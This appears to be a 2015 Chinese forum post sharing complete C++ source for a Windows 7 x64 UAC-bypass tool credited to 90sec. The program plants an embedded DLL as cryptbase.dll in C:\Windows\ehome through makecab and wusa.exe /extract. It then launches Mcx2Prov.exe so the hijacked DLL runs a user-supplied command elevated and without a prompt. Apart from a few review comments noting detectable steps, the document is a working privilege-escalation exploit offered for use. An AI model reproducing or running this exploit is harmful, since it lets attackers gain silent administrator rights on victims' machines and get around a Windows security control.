WIN7 X64 PASSUAC 源码
2015-09-06 23:11
// Passuac.cpp : Defines the entry point for the console application.
//
// NOTE(review): this is the Windows 7 x64 UAC-bypass sample posted on the page;
// the embedded DLL resource it writes out (IDR_TESTDLL1, type "TESTDLL") is
// not part of this listing, see the prose below the code.
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <direct.h>

// Returns TRUE when the current user belongs to BUILTIN\Administrators, even
// when the process runs with a filtered (non-elevated) UAC token.
BOOL IsUserInAdminGroup() // Check whether the user is in the Administrators group
{
    BOOL fInAdminGroup = FALSE;
    HANDLE hToken = NULL;
    HANDLE hTokenToCheck = NULL;
    DWORD cbSize = 0;
    OSVERSIONINFO osver = {0};
    osver.dwOSVersionInfoSize = sizeof(osver);
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) goto Cleanup;
    if (!GetVersionEx(&osver)) goto Cleanup;
    // Vista and later: a limited (filtered) token has a linked full token;
    // membership is checked against that linked token instead.
    if (osver.dwMajorVersion >= 6)
    {
        TOKEN_ELEVATION_TYPE elevType;
        if (!GetTokenInformation(hToken, TokenElevationType, &elevType, sizeof(elevType), &cbSize)) goto Cleanup;
        if (TokenElevationTypeLimited == elevType)
        {
            if (!GetTokenInformation(hToken, TokenLinkedToken, &hTokenToCheck, sizeof(hTokenToCheck), &cbSize)) goto Cleanup;
        }
    }
    // No linked token (pre-Vista, or not a limited token): CheckTokenMembership
    // needs an impersonation token, so duplicate the primary one.
    if (!hTokenToCheck)
    {
        if (!DuplicateToken(hToken, SecurityIdentification, &hTokenToCheck)) goto Cleanup;
    }
    BYTE adminSID[SECURITY_MAX_SID_SIZE];
    cbSize = sizeof(adminSID);
    if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, &adminSID, &cbSize)) goto Cleanup;
    if (!CheckTokenMembership(hTokenToCheck, &adminSID, &fInAdminGroup)) goto Cleanup;
Cleanup:
    if (hToken) CloseHandle(hToken);
    if (hTokenToCheck) CloseHandle(hTokenToCheck);
    return fInAdminGroup;
}

// Returns TRUE when the process's *current* token is a member of
// BUILTIN\Administrators, i.e. the process is already running elevated.
// (dwError is recorded but never used by callers.)
BOOL IsRunAsAdmin() // Check whether the process runs with administrator rights
{
    BOOL fIsRunAsAdmin = FALSE;
    DWORD dwError = ERROR_SUCCESS;
    PSID pAdministratorsGroup = NULL;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    // S-1-5-32-544 (BUILTIN\Administrators)
    if (!AllocateAndInitializeSid( &NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdministratorsGroup))
    {
        dwError = GetLastError();
        goto Cleanup;
    }
    // NULL token => the calling thread's effective token.
    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin))
    {
        dwError = GetLastError();
        goto Cleanup;
    }
Cleanup:
    if (pAdministratorsGroup) FreeSid(pAdministratorsGroup);
    return fIsRunAsAdmin;
}

// Step 1 of the bypass: drops the embedded resource as cryptbase.dll in the
// current directory, wraps it in a cabinet with makecab, and has wusa.exe
// extract it into C:\Windows\ehome\. For defenders, the wusa.exe /extract
// into a system directory followed by Mcx2Prov.exe loading cryptbase.dll from
// that directory is the observable sequence. Returns 0 only when the
// temporary file cannot be created; wResID is unused.
BOOL writedll64()
{
    char Szpath[MAX_PATH] = {0};
    char uacexqute[1024] = {0};
    DWORD dwWrite=0;
    WORD wResID;
    HANDLE hFile = CreateFileA("cryptbase.dll",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Getlasterror:%d.\r\n",GetLastError());
        return 0;
    }
    // Payload DLL comes from the executable's own resource section.
    HRSRC hrsc = FindResource(NULL,MAKEINTRESOURCE(IDR_TESTDLL1),L"TESTDLL");
    HGLOBAL hG = LoadResource(NULL, hrsc);
    DWORD dwSize = SizeofResource( NULL, hrsc);
    WriteFile(hFile,hG,dwSize,&dwWrite,NULL);
    CloseHandle( hFile );
    // Absolute path of the .cab; makecab and wusa are run via the shell.
    getcwd(Szpath, MAX_PATH);
    strcat(Szpath,"\\cryptbase.tmp");
    system("makecab cryptbase.dll cryptbase.tmp");
    sprintf(uacexqute,"%s /extract:C:\\Windows\\ehome\\",Szpath);
    ShellExecuteA(NULL, "open", "wusa.exe", uacexqute, NULL, SW_HIDE);
    //remove("cryptbase*");
    DeleteFileA("cryptbase.dll");
    DeleteFileA("cryptbase.tmp");
    return true;
}

// Usage: argv[1] == "passuac" performs step 1 (writedll64); any other
// argv[1] is step 2: it is passed, quoted, to C:\windows\ehome\Mcx2Prov.exe
// and the output the planted DLL is expected to leave in
// c:\programdata\uac.txt is printed. Nothing runs if the process is already
// elevated. Options, si and pi are declared but never used.
int main(int argc,char* argv[])
{
    FILE* fp;
    char szcmd[1024] = {0};
    char *Options;
    char buffer[2048] = {0};
    STARTUPINFO si={sizeof(si)};
    PROCESS_INFORMATION pi;
    si.dwFlags=STARTF_USESHOWWINDOW;
    si.wShowWindow=TRUE;
    if (argc < 2)
    {
        printf("[*]:%s Passuac for windows 7 x64\n",argv[0]);
        printf("[*]:%s Setp1: passuac\r\n",argv[0]);
        printf("[*]:%s Setp2: shell_cmd\r\n",argv[0]);
        printf("[*]:Welcome to www.90sec.org\r\n");
        printf("[*]:Pass uac t00ls By:@90sec\r\n\r\n");
        return 0;
    }
    strcpy(szcmd,argv[1]);
    // The command is wrapped in double quotes before being handed to Mcx2Prov.exe.
    char szNewCmd[MAX_PATH] = {0};
    wsprintfA(szNewCmd, "\"%s\"", szcmd);
    if (!IsUserInAdminGroup())
    {
        printf("Your not have in Local Administrator Group\r\n");
        printf("Program exit;");
        exit(1);
    }else
    {
        printf("Your have in Local Administrator Group\r\n");
        printf("PassUac ing.....\r\n");
        if (!IsRunAsAdmin())
        {
            if (!strcmp(szcmd,"passuac"))
            {
                writedll64();
            }else
            {
                ShellExecuteA(NULL, "open", "C:\\windows\\ehome\\Mcx2Prov.exe", szNewCmd, NULL, SW_HIDE);
                // Fixed 4 s wait for the spawned process to write its result file.
                Sleep(4000);
                fp = fopen("c:\\programdata\\uac.txt","rb");
                if (fp == NULL)
                {
                    printf("Getlasterror:%d\r\n",GetLastError());
                    return 0;
                }
                ZeroMemory(buffer,sizeof(buffer));
                while (fgets(buffer,sizeof(buffer),fp))
                {
                    printf(buffer);
                }
                fclose(fp);
            }
        }
    }
    return 0;
}
需要自己写个 DLL 来进行参数解析，请看代码吧。
代码写得相当烂，但是能够达到目的，还请各位莫笑话。